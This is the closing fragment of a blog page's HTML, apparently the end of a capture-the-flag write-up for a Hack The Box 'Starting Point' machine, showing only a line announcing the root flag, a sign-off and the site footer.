width="1732" height="662" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-318.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-318.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-318.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-318.png 1732w" layout="responsive"></amp-img></figure><p>We got the root flag. 😎😎</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-319.png" class="kg-image" alt width="805" height="719" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-319.png 600w, http://192.168.8.3:2368/content/images/2021/05/image-319.png 805w" layout="responsive"></amp-img></figure><p>Now on the path of Starting point machines, we have only left two machine now.</p><p>I’ll see you on the next box! 🙋‍♂️🙋‍♂️</p><p><strong><strong>Find me on </strong></strong><a href="https://twitter.com/ShapManasick" rel="noopener noreferrer">@twitter</a></p><hr></hr>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="http://192.168.8.3:2368/content/images/2021/05/hnet.com-image.ico" width="50" height="50" layout="fixed"></amp-img>
        <h3>h4rithd.com</h3>
            <p>Penetration Tester | Ethical Hacker | Security Researcher</p>
        <p><a href="http://192.168.8.3:2368">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"/><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"/><rect y="34" width="84" height="17" rx="4"/><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"/><rect x="67" width="17" height="17" rx="4"/></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
</html>
